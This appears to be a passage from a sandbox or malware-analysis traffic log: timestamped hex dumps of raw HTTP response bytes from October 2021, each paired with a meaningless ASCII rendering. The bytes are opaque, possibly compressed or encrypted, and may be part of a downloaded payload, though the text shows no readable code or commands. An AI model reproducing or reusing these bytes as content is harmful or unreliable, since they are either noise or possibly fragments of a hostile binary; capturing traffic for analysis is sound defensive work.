e8 18 28 86 e4 64 46 7f ab b9 a7 ec 63 1a 55 55 4b 6e cd 75 1a db 6a 55 a6 2b a6 52 c5 23 1f 07 a4 c1 3b 38 f8 65 86 51 0d 2b 65 9f 98 14 13 98 d4 28
                                                                            Data Ascii: VB"/`Kt_#c#_IQ0yfJr4MPqT_Gw;kfm94>;f$iESHTnPga`{/OH?7I(g~@JF#T60g\gpTN(dFcUUKnujU+R#;8eQ+e(
                                                                            2021-10-13 17:30:43 UTC123INData Raw: 90 35 03 97 fe a0 25 98 93 16 b7 56 23 19 03 08 d1 fc 33 ef 3c 2b c9 71 f7 f8 67 7b 43 aa 33 b5 f3 4c 28 bf 98 21 23 58 bd 08 94 17 df d0 35 89 68 5c e7 a3 81 25 c7 ba 71 cf d5 04 ff 7e 4a 22 d2 7a 55 09 cd 56 e4 66 92 2f c7 45 e3 8f ed 22 8c ec 25 f9 e7 9d 56 bb f8 d0 ec bb e0 62 32 74 23 f4 f9 39 d4 9e f0 65 f0 01 0e b3 98 44 75 c9 9d d6 99 e3 8c 46 fb b3 a0 ee b7 90 49 da 18 e0 e5 55 b4 18 a2 32 5f c4 56 81 5a bb 9e 81 3e a5 a6 62 02 10 05 aa 6e a1 6f d2 57 46 56 94 9c fd 2c 27 18 b8 b3 11 35 52 1d f1 5c 57 fc a2 06 64 4a 53 bf 16 92 7a 75 c0 fd 2b eb 86 f1 b9 f0 3a 5f 97 5f 1d 75 68 1d 5e cd 4e 49 ac 46 7d d1 42 84 58 f4 92 e8 af dd 57 d8 a2 0b dd c0 0b 78 a1 59 9a e7 56 be 3e f7 4b 98 66 4a 79 7e d5 8a d6 ee 6c 36 c8 39 e7 1d 60 30 5b 13 b2 e5 63 ae
                                                                            Data Ascii: 5%V#3<+qg{C3L(!#X5h\%q~J"zUVf/E"%Vb2t#9eDuFIU2_VZ>bnoWFV,'5R\WdJSzu+:__uh^NIF}BXWxYV>KfJy~l69`0[c
                                                                            2021-10-13 17:30:43 UTC124INData Raw: a6 6f 0c 52 f0 df 15 13 0f 1b bf 13 f7 2c 67 20 cc ae a8 36 4e 8c 4e fd 0f 65 3c d2 82 8d 98 4d ca ff 44 60 d3 77 66 96 5f d1 a6 35 bb ca ce 73 97 f8 e2 74 47 06 52 1a d0 2e e9 e2 cc 13 1f a8 ca c3 27 75 37 88 6c ac ef 5c bf 0d 9d 90 e0 96 83 ac ab 99 fc 9b 5f e1 77 d1 f4 ae 05 7d 4f a1 5c cc 63 d9 ac aa 0d 84 2e f8 45 66 14 46 dc 02 c1 20 02 b4 c9 d5 ae 1c ba e4 17 04 d6 da cd c0 c0 68 23 8f 52 93 71 b7 55 a9 5a 06 5e 03 0e 74 ed 1d 25 ab 1c 67 96 01 1a 3f 9e 85 82 d8 61 57 c1 89 9d 17 a5 fc 89 01 71 50 46 a8 0d 9f 0f c0 80 7f 1a d3 ec e3 3d 54 f5 5a 94 7b a7 b7 f8 2f 60 1f d1 f1 31 f5 c3 66 09 d9 79 39 3d 27 58 57 c1 6c 0c 02 86 97 bd 39 fe 49 a7 47 0f 5a ce 0b 98 10 1b f0 58 36 50 21 bc 8c 7e af ae 16 d4 ca f9 56 eb ac 58 9a 93 a1 d3 95 99 c9 24 e6 61
                                                                            Data Ascii: oR,g 6NNe<MD`wf_5stGR.'u7l\_w}O\c.EfF h#RqUZ^t%g?aWqPF=TZ{/`1fy9='XWl9IGZX6P!~VX$a
                                                                            2021-10-13 17:30:43 UTC125INData Raw: e7 ec 51 46 bc 17 ae ea 73 39 e4 97 21 23 58 84 42 fb 9e d6 bf 19 97 f2 7f db b8 b6 35 f0 a7 6b c3 fb 01 d3 7c 4c 0e a0 ef ce 08 c7 3d dd fe b7 04 dd 73 ef 9b f9 10 86 c4 0e d3 c9 99 7c e7 ae a2 ef bb ee 13 8e 53 0e f9 ce 37 c8 ba c5 6a d8 2a 0a a2 8e 01 00 b6 04 dd 47 e8 b6 67 56 96 8d e8 82 9b 68 fd 40 ff e3 a3 99 0b a8 23 a3 b5 22 09 51 aa 8d a0 41 c1 7c b0 1f 23 0d 76 62 d0 61 cc 6e 7d da 23 a5 3c 8f a6 7e bf 99 15 6b 6d 87 d4 71 5c da bd 5e 7b 25 4a 9c 3b 90 7a 2d ea 9f 55 60 87 f1 bd f5 36 c5 b3 72 11 53 77 8c 41 bf 51 38 85 6b 7f db 46 ae 36 85 0b e9 af c3 48 d5 39 35 c0 c6 2d 3d ad 79 14 e2 57 be 30 ff 69 b7 72 25 9e 55 bb fe 50 b0 5f 3a d5 20 12 30 4c 3f 77 06 ba ed 67 ae 19 a3 dc 33 d1 9d 7a b5 0a 40 f8 2c d5 ef a2 94 54 1e e8 b6 08 8f da dd c8
                                                                            Data Ascii: QFs9!#XB5k|L=s|S7j*GgVh@#"QA|#vban}#<~kmq\^{%J;z-U`6rSwAQ8kF6H95-=yW0ir%UP_: 0L?wg3z@,T
                                                                            2021-10-13 17:30:43 UTC127INData Raw: 48 36 d3 84 b6 f0 cd 46 b3 44 64 ce 43 82 86 72 df 84 57 f3 eb 42 75 95 28 b7 5c 6a 06 7a 08 fa 44 9d 53 cd 12 1b bd 80 24 03 58 3d ad 67 65 ce c4 43 0c 97 8f e4 96 83 af 23 04 eb 65 c7 e0 73 d7 e9 ed 1f 59 62 ab 52 8b 59 f9 37 d5 72 85 35 d4 6b 72 16 3b 89 69 bf bd 01 cf 4d cb 97 82 b7 24 1b 22 c3 e7 f9 a8 c3 7e dd 92 71 b9 5f 9a 51 87 be cf ba 80 0f 70 f6 25 bd f5 b3 68 b0 1a 08 47 00 87 88 a5 fd 7e ec 8f 99 07 8d ed 76 99 70 54 40 cc b4 04 2a e9 a6 b4 07 e8 c6 45 2b aa f4 55 42 57 a9 bf d2 42 0c 64 c6 47 4c 75 dd 5a 97 fe 56 4d 9f 39 64 73 4f 36 0e 02 93 e3 16 15 fc 4d a4 7b 67 5f d4 0b 98 10 06 b6 46 12 7d 2b b2 7e 41 8f 0b 16 d1 44 59 03 40 af 58 98 bb c9 d6 8a 99 c9 24 d1 07 34 d6 54 00 e6 19 3d e3 c8 e8 54 e3 5e 1b 43 52 1f 4e e5 c6 71 a8 b4 d4 cc
                                                                            Data Ascii: H6FDdCrWBu(\jzDS$X=geC#esYbRY7r5kr;iM$"~q_Qp%hG~vpT@*E+UBWBdGLuZVM9dsO6M{g_F}+~ADY@X$4T=T^CRNq
                                                                            2021-10-13 17:30:43 UTC128INData Raw: f6 b7 8f 4c 75 b2 59 c1 f5 33 b4 5c de 20 fa 91 4b 21 ea 3b c0 62 b8 47 a8 cc f3 84 c1 10 ef 76 06 fc c6 b9 49 db f0 a1 ea bb ea 12 04 5e 0e f0 e8 2f fd 9b a4 fe f1 07 0c bd ef b1 47 e5 93 fa 58 8b 89 c4 c8 b3 a0 ff 8c a9 63 e2 1e ca 81 f5 2d 08 a8 21 96 bf c6 b5 7d a5 af a0 23 7b f6 99 13 05 0d 73 55 99 7c c7 40 7a b2 5d 3a 17 d1 dc f8 d7 03 34 59 68 3b ee 35 77 42 a6 55 64 51 7b 99 14 92 7c 01 ae 83 b2 f8 86 f5 a6 80 a0 7a bb 50 3b 6a 02 a0 9d c9 4e 24 b2 63 55 f6 42 84 5e d1 fc 96 36 c6 57 dc bc 7b 77 ec 26 2d 86 46 f1 c2 bf ba 2f f5 5e 91 58 08 9a 7f d3 aa a7 cf c6 3f ca 2a 97 79 fb 15 7c 16 92 d2 93 8e ea a7 c3 39 e6 a5 50 98 0e 6a 90 78 26 90 3b 91 4b 15 6d fe bf a5 d1 cc e1 b5 d6 31 0d df f1 dd ad e2 91 18 b7 4f 34 7f 06 38 8a 2a 8a 80 49 91 a0 64
                                                                            Data Ascii: LuY3\ K!;bGvI^/GXc-!}#{sU|@z]:4Yh;5wBUdQ{|zP;jN$cUB^6W{w&-F/^X?*y|9Pjx&;Km1O48*Id
                                                                            2021-10-13 17:30:43 UTC129INData Raw: da 73 47 04 60 26 fd 2c e3 cc e6 90 61 3b b6 be 22 55 a2 8b 78 52 74 6f 6c 1d b1 b6 5d bb 81 af 05 57 86 1b 5e fb 5b fe f4 d5 83 56 cd db ed 95 61 dd 86 45 72 85 2e 66 63 5d 07 1b 83 91 c1 24 00 ef 34 d3 ae 18 8a 21 38 06 dc d8 f3 bc bf e7 dc 8e 5d b4 ce 9a 57 ad 4e 94 0e 90 29 54 7a 1f 27 d0 be 19 91 05 32 7a b4 a8 8a a5 e6 7c 43 f3 00 00 a7 83 28 94 71 54 44 49 aa b3 1e e2 88 06 18 d3 e6 c6 af ad f4 4c 74 52 86 bd d4 6e 48 98 21 df 4d 71 c6 46 98 db 7b 42 23 03 75 42 cf 14 9b 02 8c ea 1e b6 f9 4d a2 46 25 0c 4f 0a 9e 3e 9b f5 45 36 50 21 b4 f7 7c af a4 8e f4 69 5f 0d 4d 3b 58 9e 91 83 27 14 98 c9 37 e6 14 ac f3 7f 24 42 78 9a c2 78 ee 74 74 49 33 6e ca 3a 65 de 8a 2f a6 b5 d4 c8 78 a2 eb 69 5b 5a 12 8a a2 61 fb ad aa 32 ab 16 5e a8 5e c2 a3 6a 7f 44 1c
                                                                            Data Ascii: sG`&,a;"UxRtol]W^[VaEr.fc]$4!8]WN)Tz'2z|C(qTDILtRnH!MqF{B#uBMF%O>E6P!|i_M;X'7$BxxttI3n:e/xi[Za2^^jD
                                                                            2021-10-13 17:30:43 UTC130INData Raw: eb 01 df ed c6 cc 7d a8 f7 87 d3 b8 3b 0c 68 49 67 de 02 c3 ed fb af 66 09 39 db 16 62 6e 90 10 ed 95 e8 10 ad 0d 40 cf d8 96 32 08 e4 ef c1 6f 12 f5 ff 71 70 eb 0e 33 71 22 9d 36 71 7f fd f7 25 b2 4d 3f 94 2d d5 e2 f3 90 7d 8b 6f 0e 57 a7 26 6a 8a 0a 19 bf 4e 22 2d 67 24 7c 8b 96 17 6c ac 0d fd 0f 65 14 80 8a 9c 9a a8 f7 9f 46 60 d7 5f 9a dd c6 d0 a2 4c e5 61 ce 77 95 b2 8a 59 56 22 5a a4 d0 2e e3 ea 94 1a 1f a2 ad 96 0b 77 33 8d 52 d0 90 d3 40 0c 93 b6 67 bb 81 af bf 0b ac 0a 78 c1 d8 d3 f6 d5 a5 20 47 a5 74 8a 49 f4 a4 d7 74 af ac 82 df 71 16 39 83 af c1 24 00 55 6c f9 bf 3e b2 a5 15 04 dc fe bd 36 c1 7e c4 a6 74 96 5d 9c 7d 2b aa 28 22 81 0b 54 44 1f 27 d0 04 43 bb 17 14 47 31 85 88 a5 c0 31 c9 8d 99 1e a8 af 25 02 71 52 6e 51 f1 07 0e c4 ac b2 b6 d3
                                                                            Data Ascii: };hIgf9bn@2oqp3q"6q%M?-}oW&jN"-g$|leF`_LawYV"Z.w3R@gx GtItq9$Ul>6~t]}+("TD'CG11%qRnQ
                                                                            2021-10-13 17:30:43 UTC131INData Raw: 5f d1 79 aa 16 39 4e b8 94 63 31 eb a1 1a 17 1b 1c b9 4d a0 ed 66 41 c7 87 c3 70 4a 53 b2 12 5e 70 f1 d3 28 66 ea bc 15 ab ad d2 db aa 48 46 89 44 c3 1c 24 66 97 fe a2 1d 38 41 14 b7 c6 69 ca 10 2e f7 20 3d fe 32 75 5f 7a f7 fc 69 56 43 9b 33 b5 f3 75 a5 b2 23 22 23 5a 8e c8 85 07 d7 25 38 a6 7a 7c d6 63 90 29 ef b7 88 c5 d3 2c ce 5f 62 09 f8 91 51 23 41 47 59 65 92 2d f6 84 f2 84 c5 95 ac c1 31 f7 e9 4e 56 bd d0 1b f1 b0 ea 0d 0b 53 0b df ea 29 d1 db 5c 19 69 06 08 a6 a8 f9 62 c8 9d 46 62 c1 bb 48 ec 61 a0 e4 a4 a4 25 e9 18 e0 f0 ad 9c 24 aa 25 8f fd da ee c9 ab 89 bb 6b 88 59 9d 13 9f 37 51 6f 92 5e 14 46 50 d8 03 c9 1d d1 d8 f8 99 b1 3c 76 66 1b db da 29 65 a3 55 60 6a 87 b4 16 92 e0 0e ed ef 0d d9 52 f1 b9 ea 1a ce 9d 5f 1d 6a 4d a8 73 cf 4e 22 87 c0
                                                                            Data Ascii: _y9Nc1MfApJS^p(fHFD$f8Ai. =2u_ziVC3u#"#Z%8z|c),_bQ#AGYe-1NVS)\ibFbHa%$%kY7Qo^FP<vf)eU`jR_jMsN"
                                                                            2021-10-13 17:30:43 UTC132INData Raw: 14 c9 30 d8 ec bd 01 cb 95 26 18 ad 0d 7f 38 fd bb 30 15 ca e8 45 11 8d de 7d 0b c9 42 0e 37 51 4d b8 1b 63 c3 f8 72 34 94 6d ea d7 25 d5 c2 e9 8e 55 a6 77 26 7c 8f a4 12 39 89 67 22 6f 8b 29 47 d2 e6 ae bb 9c 6f a1 b5 db 2f 93 34 d3 82 bc 93 bd df b2 5e 48 fc 77 18 a5 75 53 dc d1 c4 cb ca 57 62 28 af 74 dd 21 57 1f f6 0e 14 ca cc 12 3f af b9 be 26 6f 1b a6 7a 52 e8 60 c3 72 0e 97 cc bf a1 57 25 2e 81 81 7b cc 62 f5 d6 2d 85 7c 4f 85 65 9a 61 d9 bf ff 5f 87 2e fa 6c f2 68 a4 a2 03 c5 04 f9 cf 49 d4 34 3d bf 18 33 24 25 de d9 3e e1 6a d3 8e 59 89 75 b7 55 ad d2 9b a1 ff 96 75 e9 1b 07 2a 9e 66 96 9f 17 4a 8d a3 a8 5f e0 56 c1 ad 82 0f a7 87 15 28 5c 56 44 d5 a5 18 71 5d a9 92 1c f3 1d e6 29 aa 6e 69 47 68 8d 9f 2f 68 62 1a 7f 64 42 71 c2 79 00 f3 56 40 b9
                                                                            Data Ascii: 0&80E}B7QMcr4m%Uw&|9g"o)Go/4^HwuSWb(t!W?&ozR`rW%.{b-|Oea_.lhI4=3$%>jYuUu*fJ_V(\VDq])niGh/hbdBqyV@
                                                                            2021-10-13 17:30:43 UTC134INData Raw: e3 6b d1 76 9f 9a 5d 7d 2e f5 08 7d cb 04 1f 8b bf dd f9 82 7b 6c a4 40 e9 9c 70 79 e8 67 a7 3d f3 61 08 b6 5c 4c 7d 27 25 c5 c9 1d e2 33 55 85 50 ed ec 76 74 74 97 19 98 f7 5f 25 e6 3c 5d ba 5f ae 1c a5 1a d6 bf 1d 11 4d 77 e4 95 b0 34 ee 97 74 ef e8 3c d1 7c 55 2d d2 bc 55 09 c1 13 46 1a 0b 28 d6 51 d2 9a c4 0f 89 76 06 fc db b9 76 a3 d1 3b ee 9b ae 1d 14 76 3c e1 c0 04 d5 f1 dc 4d 72 79 91 a3 88 2f 42 d7 9c dc 47 76 8c 43 dd 95 80 fb a5 84 61 c2 4f f0 ef 8b af 21 85 27 89 d1 76 16 2e 33 88 bf 4f 7b 79 9c 13 05 88 59 50 a6 58 e7 66 51 d8 23 83 4a c1 d8 e7 a1 96 39 59 64 1d f7 76 d5 82 3b 54 64 4e 73 95 17 92 7a b1 e5 d0 3a df a6 d0 b8 ea 3a 7f fd 4f 1d 75 76 a8 73 cf 4e 22 87 c0 03 42 41 84 5c db b0 e9 af c7 cd fd 8e 02 cb e9 29 23 a0 59 ba 91 47 be 2f
                                                                            Data Ascii: kv]}.}{l@pyg=a\L}'%3UPvtt_%<]_Mw4t<|U-UF(Qvv;v<Mry/BGvCaO!'v.3O{yYPXfQ#J9Ydv;TdNsz::OuvsN"BA\)#YG/
                                                                            2021-10-13 17:30:43 UTC135INData Raw: fd 75 56 69 88 4d e8 b9 b8 1f 43 1b dc 5f 25 28 68 32 c5 03 f5 a0 ed 80 55 86 7f 1c 51 8d bb 07 3b 26 1b bb 68 a1 ab 19 bd e7 ae bf 26 09 8d a4 fd 95 40 19 c1 a4 bc d9 b2 df b2 64 45 c3 75 18 bc 7b f9 8f 4a c5 cd e4 f1 eb b1 ae 74 43 24 3e 0f d0 2e 79 ef e1 00 39 82 f3 bf 26 75 13 c2 6a 52 ee 55 5e 24 ba 94 cc bd ab 29 5b b7 80 1b 5a c1 36 d2 f6 d5 1f 59 62 b7 52 b4 24 d8 a6 d7 52 ed 3c fc 46 6f 32 15 8e 01 c1 22 2a 49 37 4d af 18 96 29 53 05 dc de 43 1b ec 6c fb ae 1f 95 5d 9a 77 21 c6 b1 23 9e 2c 5c c4 1d 27 d6 b4 e0 e8 9c 33 67 98 a5 cf a4 e0 56 5b a8 b4 13 81 a7 4f 01 71 54 64 7c 9d 9e 0f db 8c ba 35 d1 e6 e0 03 2c 8a d5 6b 7a af 9f 9c 69 62 1a c5 63 61 63 e4 46 45 da 7b 42 99 f5 4a 53 e9 2b 01 2a a1 e8 3e 3e d4 cb dc c8 0c 21 49 2a d1 15 19 8b 46 12
                                                                            Data Ascii: uViMC_%(h2UQ;&h&@dEu{JtC$>.y9&ujRU^$)[Z6YbR$R<Fo2"*I7M)SCl]w!#,\'3gV[OqTd|5,kzibcacFE{BJS+*>>!I*F
                                                                            2021-10-13 17:30:43 UTC136INData Raw: bc 7a 97 97 fe a6 1d 98 54 14 b7 42 64 ca 00 08 d1 c5 bf 80 ab 54 85 74 d7 95 77 74 6b 2c 14 98 e4 79 03 a5 bb 23 23 7e d9 0d 85 07 c9 97 30 89 68 5c dc 31 ee b0 ee 97 70 ef b9 2d d1 7c d0 01 d7 80 71 29 ad 38 c0 64 b2 56 c3 55 f2 9e ed 22 8b ec 25 fb 4b e1 cf bc d0 3f ce d0 eb 0d 14 ec 06 df f9 0f f7 9a db 67 f0 27 8b b7 88 2b 78 e0 b0 de 47 ea 83 ec b2 2a a1 e4 a0 a4 0d e3 18 e0 75 ae 99 18 8e 05 e5 d6 5c 90 70 2d 9c bf 4b 40 71 b0 11 05 14 56 fb ca e7 c6 46 54 f8 4e a2 16 d1 42 c2 93 8b 37 54 0b 1c f1 5c 77 70 b7 55 64 55 58 9c 3b 90 7a 2d ea 7b 55 60 87 f1 bd ca 54 5e 96 5f 87 50 45 92 78 ed 20 25 ad 46 5d 4c 55 84 58 e4 9e c0 82 c5 57 de 89 96 93 50 0a 22 a4 79 f5 e3 57 be b5 d0 6c 88 56 05 f7 7e d5 80 e9 12 4a 3e ca 31 a8 3d 4c 32 51 1f 9e 4b 81 37
                                                                            Data Ascii: zTBdTtwtk,y##~0h\1p-|q)8dVU"%K?g'+xG*u\p-K@qVFTNB7T\wpUdUX;z-{U`T^_PEx %F]LUXWP"yWlV~J>1=L2QK7
                                                                            2021-10-13 17:30:43 UTC137INData Raw: 86 e2 0f 51 8d 3e 31 3e 19 3f 9b e1 8a 2d 67 04 4a b9 bb 06 55 9f 8c d0 0d 65 32 f9 04 e2 03 b2 df b6 64 f0 d0 75 18 39 7a fc b0 6e e5 5b cf 77 95 08 10 63 47 04 65 07 f8 03 e1 ca ca 38 99 dc 2e bf 26 71 13 1a 79 52 ee d0 64 21 85 b0 ec 2a 80 af 25 0e 49 0c 5e e1 6c dd de f8 87 7c 49 8f f2 ea f8 d8 a6 d3 52 17 2f fc 46 ea 33 10 b1 25 e1 b6 01 cf 49 f4 78 0f 92 09 0a 08 f4 f3 db 3e c7 54 5f f0 c0 95 5d 9e 77 3e d5 b1 23 1b 2a 59 f8 39 07 43 9f 66 96 25 d0 70 9c 85 91 8d cd 54 c1 8b b3 83 d9 1e 09 00 75 74 d0 d2 8f 9e 95 e1 85 83 3e f3 72 e7 29 aa d4 a9 7d 7a ab a4 fc 45 60 1a 59 6c ce 0f 5b 67 0d df 5b d7 b8 26 58 c9 cc 19 1f 24 ac 7f 3f 38 fe 6d 48 46 0d 21 50 22 b5 16 19 8d f6 b5 2e bc 95 61 78 8f 32 15 d1 44 d4 0e 40 bc 7e be 07 a2 a8 13 b8 38 37 ce 39
                                                                            Data Ascii: Q>1>?-gJUe2du9zn[wcGe8.&qyRd!*%I^l|IR/F3%Ix>T_]w>#*Y9Cf%pTut>r)}zE`Yl[g[&X$?8mHF!P".ax2D@~879
                                                                            2021-10-13 17:30:43 UTC139INData Raw: fd 76 70 4b 00 30 b5 f5 c5 06 e1 ab 05 03 e8 af 18 85 27 80 a6 1d 8b 75 72 db b1 90 2f c5 15 0a 56 d2 2c d5 5c fd 25 fa 91 cd 2c ea 28 e6 44 25 28 d6 55 d2 da dc 0f 89 fb 0b fc cb 9f 50 97 52 45 77 ba ea 09 34 ce 22 f2 e8 b3 f2 dc cb 41 d0 bf 09 a2 88 0b 3d d1 9d dc 5b c4 84 6c cc b5 8a 66 da 1d 60 e2 1c c0 56 8a b4 09 32 00 a4 c6 7a b0 e9 ab 89 bf 6b 3e 40 9d 13 18 3a 51 7f b4 78 ed c4 2e 41 22 a3 12 f1 62 e6 be 99 8b 51 4b 0c d7 7c ed fd a2 55 44 26 4a b4 16 8e 52 06 c2 fd 2d d3 04 8f 20 eb 3a 5b b6 e4 1c 75 68 1a 7b e0 5f 02 8d fd 7c db 40 a4 2a e2 92 e8 b2 ef 7a da a3 16 c7 4f 75 bb a1 59 9e c2 eb bf 2f f5 db bf 5d 37 be 5f 69 81 c9 b1 7f 47 d3 2e 88 0a 79 18 7c 1b b4 cb d5 2c 67 3a c2 39 fd 90 c5 b4 0c 6a 0c 77 61 ff 84 b0 f6 10 72 93 05 11 e5 c2 c7
                                                                            Data Ascii: vpK0'ur/V,\%,(D%(UPREw4"A=[lf`V2zk>@:Qx.A"bQK|UD&JR- :[uh{_|@*zOuY/]7_iG.y|,g:9jwar
                                                                            2021-10-13 17:30:43 UTC140INData Raw: 65 30 f3 5f 9d 9a b3 45 97 69 71 f7 55 c5 a2 5f d1 82 6a de cb ce 6f bd 05 ad 74 41 2e fc 70 49 2f e3 ce ec cc 1e a2 b7 24 03 58 21 ad 58 8c ef 4a 41 2c b3 8d cc bb 9e a4 0d 03 83 1b 58 cb f5 ad 6f d4 85 78 6f 7a 75 94 61 43 83 fa 60 a3 0e 23 47 70 16 1d 8c 18 c1 24 1f df 61 f9 ac 18 94 23 93 7a 45 df d9 3a e1 9e dc 8e 59 0e 78 b7 45 8b f4 51 22 81 0f 54 d6 04 27 d0 81 45 be 28 30 67 9a af 0a db 79 57 c1 89 b9 e0 a6 87 08 9a 54 79 55 f5 af 7f 0e c4 a8 b2 7a c8 e6 e6 30 82 d9 4e 6a 7c 81 3d aa f1 63 1a 5b 66 ae 70 c2 66 97 fe 56 53 9f 06 ba 52 e9 34 2e 67 97 ea 3e 25 d6 60 a0 51 0b 0b cb 74 01 15 19 8f fc d4 51 25 94 fb 59 82 b6 32 f1 a7 4f 2b 6d 8d 34 85 91 a3 b7 06 b0 e4 22 ce 3f 84 75 07 97 c1 06 07 e3 9c eb 54 e3 d3 16 43 42 39 68 2b ad 0f 31 95 55 d3
                                                                            Data Ascii: e0_EiqU_jotA.pI/$X!XJA,XoxozuaC`#Gp$a#zE:YxEQ"T'E(0gyWTyUz0Nj|=c[fpfVSR4.g>%`QtQ%Y2O+m4"?uTCB9h+1U
                                                                            2021-10-13 17:30:43 UTC141INData Raw: f6 b7 b0 2d ed 97 74 55 f6 01 c3 5a 6a 20 f8 91 57 29 1d 25 c0 64 8d 22 fe 78 f0 84 c3 25 0b 92 ba d0 c9 9b 76 b8 d2 3b ee 21 cf 20 05 50 03 f7 ea 29 d7 d1 3f 7b f0 07 13 8a a5 29 62 ce b7 5a 39 75 a8 6e c8 93 a6 e6 a4 84 fb c7 35 f2 c9 ab b2 0b a8 25 a9 3d 40 90 50 b5 85 97 66 59 59 9b 39 83 6c e5 7c b4 7a e7 41 52 d8 23 39 33 fc ca c1 9e 9e 13 74 66 3d 07 40 57 fc bd 43 4c 67 51 b4 10 b8 f8 55 59 fc 2b fd a6 f9 bb ea 3a c5 b3 72 0c 53 48 88 5c cd 4e 04 a1 5b 7d db 5e ac 75 f9 92 ee 85 41 29 41 a2 10 e9 e9 02 20 a0 59 00 c7 7a ac 09 d5 48 98 70 25 b8 6b c8 80 c9 ae 54 16 e7 2c 88 13 4b b6 2f 80 b5 cd fb 8e 13 a1 c3 39 63 95 55 a7 2a 4a 9c 50 4c ee 82 8f 56 11 72 8c 29 a8 d1 c0 c7 ac 91 97 7b 43 f0 dd b5 ea b7 18 b7 49 84 34 55 b3 ad 0a 85 9d 27 0b a5 62
                                                                            Data Ascii: -tUZj W)%d"x%v;! P)?{)bZ9un5%=@PfYY9l|zAR#93tf=@WCLgQUY+:rSH\N[}^uA)A YzHp%kT,K/9cU*JPLVr){CI4U'b
                                                                            2021-10-13 17:30:43 UTC143INData Raw: 82 76 47 02 50 88 ae b7 e2 ca c8 32 34 a0 b7 be bc 50 1e 99 5e 72 c5 48 41 0c b7 a4 ec bb 81 b0 7d 06 ac 19 5e e7 59 51 88 4c 84 7c 4b 85 58 96 61 d9 3c f2 5f 94 08 dc 6a 72 16 3d 83 89 e1 24 00 d4 61 f9 ac 18 94 23 93 7a 45 df d9 3a e1 53 df 8e 59 0e 78 b7 45 8b f4 9c 21 81 0f 54 66 3f 27 d0 81 6b be 28 30 67 9a af 0e db 79 57 c1 89 b9 2f a5 87 08 9a 54 79 56 f5 af b0 0d c4 a8 b2 84 f3 e6 e6 36 a7 dc 61 68 7a ad 95 52 16 fb 1b 5f 42 6c 5e c0 66 0d 41 5e 6f ab 00 78 7c eb 34 0e 22 25 ca 3e 38 e1 40 8a 7c 0f 21 4b 20 1e 6a 80 8a dc 33 70 15 96 61 7c 35 81 39 c3 62 6e 1b 6f ad 58 be 27 83 a8 13 87 c4 08 e3 3b ae f5 53 88 be 9f 02 c3 7c ca 65 e1 49 33 f4 75 32 5a e9 8c 3e 33 b5 d4 e8 9b 12 ec 69 44 4b 12 8a a2 61 fb ad aa 32 ab 16 5e a8 5e 68 a1 6a 7f 44 1c
                                                                            Data Ascii: vGP24P^rHA}^YQL|KXa<_jr=$a#zE:SYxE!Tf?'k(0gyW/TyV6ahzR_Bl^fA^ox|4"%>8@|!K j3pa|59bnoX';S|eI3u2Z>3iDKa2^^hjD
                                                                            2021-10-13 17:30:43 UTC144INData Raw: a6 d0 84 c5 10 82 c4 0e d3 c9 99 7c 3b ae a2 ef bb ee 2d 46 74 23 f2 72 0c fa e3 fc 47 a2 05 08 a2 a8 d5 40 c8 9d c3 5d c4 84 6c cc b5 8a 62 da 1d 60 e2 1c c0 bc 89 b4 09 32 00 a4 c5 7a b0 03 a8 89 bf 6b 43 7a 9d 13 1a 0a 54 50 b6 7e c1 6c d6 a6 ba a2 16 d5 f8 b3 bc 99 11 ee 43 30 e3 7a 77 a8 a0 55 64 6a 63 97 16 92 65 3f e8 d0 29 f9 80 db 3b 94 a3 5e 96 5b 3d 20 6a 80 5e 57 6b 09 bc 60 5d 8e 42 84 58 db d6 cb af c7 49 f0 8e 12 ed cf 21 a4 de c0 9b e2 53 9e 79 f7 41 9a ea 00 b5 6d f3 a0 9f b3 5f 3e ea 62 ab 15 61 2f 49 31 99 cf ff a8 33 25 bd a0 f8 b0 7c 95 5b 68 96 52 d6 cb 8f 82 6d 31 25 91 25 80 dc a6 e4 aa bb 0e 15 f2 dc df b1 cc 96 9c c9 d0 1f 11 7c 81 d3 28 8e 9f bd 2e a8 5b ea 4d 97 4f 96 04 8d b7 1f f9 2c 84 2f 7d 97 3d 95 ba ca b9 24 d2 c2 7f 84
                                                                            Data Ascii: |;-Ft#rG@]lb`2zkCzTP~lC0zwUdjce?);^[= j^Wk`]BXI!SyAm_>ba/I13%|[hRm1%%|(.[MO,/}=$
                                                                            2021-10-13 17:30:43 UTC145INData Raw: 29 ba 84 ea 9b f9 ad 25 2e a1 2d 7b e1 73 cc d7 fd a8 7e 4f a3 5e 12 1f 40 a7 d7 76 a5 57 fe 46 70 8c 18 8e 11 e7 04 79 cd 49 d4 8e 4f b7 09 15 1b d5 f6 f4 3c c1 78 f7 08 27 0d 5c 9a 53 8d ae b3 23 81 95 51 c4 0d 01 f0 e4 64 96 05 12 07 b9 85 88 ba c1 7e ec 8f 99 07 8d 01 76 99 70 54 40 f3 f4 9c 0f c4 32 b7 35 c1 c0 c6 52 a8 f4 4c 4a fb 8e bf d4 77 4a 32 72 44 4c 77 e8 e4 73 42 7a 42 bd 06 24 51 e9 34 94 27 a1 fb 18 18 82 4f a2 51 2d 88 68 0a 98 03 31 a6 de 37 56 0f 16 1f e5 ae a4 10 f1 39 4c 2b 6d 37 7d b3 80 85 88 6e 9a c9 20 ee 93 8b f3 79 19 e8 2b 01 c3 7e c0 d2 9d d0 32 6e 54 3f 36 cd ac 0f ab 90 f9 da 7e 12 92 6b 5b 40 1a 0c 85 61 fd 98 27 64 1f 15 5e aa 54 dc dd f3 7e de 3d 55 90 61 5f cb 67 cb 7e e4 29 57 09 8f 38 dc b2 8c 9d 20 6d c1 c3 19 32 6f
                                                                            Data Ascii: )%.-{s~O^@vWFpyIO<x'\S#Qd~vpT@25RLJwJ2rDLwsBzB$Q4'OQ-h17V9L+m7}n y+~2nT?6~k[@a'd^T~=Ua_g~)W8 m2o
